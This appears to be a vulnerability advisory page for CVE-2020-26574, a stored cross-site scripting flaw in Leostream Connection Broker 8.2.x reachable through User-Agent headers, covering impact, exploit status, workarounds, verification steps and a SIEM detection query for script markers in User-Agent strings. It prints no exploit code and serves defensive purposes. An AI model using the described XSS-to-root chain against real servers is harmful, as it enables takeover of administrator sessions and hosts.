CVE-2020-26574 – CVE-2020-26574 is a stored cross-site scripting... (How to Fix)

Q: What is the severity of CVE-2020-26574?

CVE-2020-26574 has a CVSS score of 9.6 (CRITICAL). CVE-2020-26574 is a stored cross-site scripting (XSS) vulnerability in Leostream Connection Broker 8.2.x that allows unauthenticated attackers to inject malicious JavaScript via User-Agent headers. This can lead to remote code execution as root when admins view the malicious content. Only affects unsupported versions of Leostream Connection Broker.

📋 TL;DR

CVE-2020-26574 is a stored cross-site scripting (XSS) vulnerability in Leostream Connection Broker 8.2.x that allows unauthenticated attackers to inject malicious JavaScript via User-Agent headers. This can lead to remote code execution as root when admins view the malicious content. Only affects unsupported versions of Leostream Connection Broker.

💻 Affected Systems

Products:

Leostream Connection Broker

Versions: 8.2.x series

Operating Systems: All platforms running Leostream Connection Broker

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects products no longer supported by the vendor according to product lifecycle documentation.

📦 What is this software?

Connection Broker by Leostream

View all CVEs affecting Connection Broker →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with root-level remote code execution, allowing attacker to install backdoors, steal data, or pivot to other systems.

🟠

Likely Case

Administrative account compromise leading to session hijacking, data theft, and potential privilege escalation within the Leostream environment.

🟢

If Mitigated

Limited to XSS payload execution in admin browser context without successful RCE due to additional security controls.

🌐 Internet-Facing: HIGH - Unauthenticated exploitation possible via web interface, making internet-facing instances particularly vulnerable.

🏢 Internal Only: MEDIUM - Still exploitable by internal attackers or compromised internal systems, but attack surface is reduced.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: CONFIRMED

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Public exploit details available showing XSS to RCE chain. Attack requires admin to view malicious content.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: N/A

Vendor Advisory: https://www.leostream.com/resources/product-lifecycle/

Restart Required: No

Instructions:

No official patch available. Upgrade to supported version or implement workarounds.

🔧 Temporary Workarounds

Input Validation for User-Agent Headers

all

Implement strict input validation and sanitization for User-Agent headers in webquery.pl

Modify webquery.pl to sanitize User-Agent input using HTML entity encoding

Content Security Policy

all

Implement Content Security Policy headers to restrict script execution

Add 'Content-Security-Policy: default-src 'self'' to HTTP headers

🧯 If You Can't Patch

Isolate Leostream instances behind network segmentation with strict firewall rules
Implement web application firewall (WAF) with XSS protection rules

🔍 How to Verify

Check if Vulnerable:

Check if Leostream version is 8.2.x and test for XSS via User-Agent header injection in webquery.pl

Check Version:

Check Leostream admin interface or configuration files for version information

Verify Fix Applied:

Test that User-Agent header input is properly sanitized and no script execution occurs

📡 Detection & Monitoring

Log Indicators:

Unusual User-Agent strings in web server logs
Multiple requests to webquery.pl with JavaScript patterns

Network Indicators:

HTTP requests with malicious JavaScript in User-Agent headers
Unexpected outbound connections from Leostream server

SIEM Query:

source="leostream_logs" AND (User-Agent CONTAINS "<script>" OR User-Agent CONTAINS "javascript:")

📊 Metadata

CVE ID: CVE-2020-26574

CVSS v3 Score: 9.6 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CWE: CWE-79

Published: October 6, 2020

Last Updated: November 21, 2024

🔗 References

https://adepts.of0x.cc/leostream-xss-to-rce/ Exploit,Third Party Advisory
https://www.leostream.com/resources/product-lifecycle/ Release Notes,Vendor Advisory
https://adepts.of0x.cc/leostream-xss-to-rce/ Exploit,Third Party Advisory
https://www.leostream.com/resources/product-lifecycle/ Release Notes,Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2020-26574, you might also want to check these: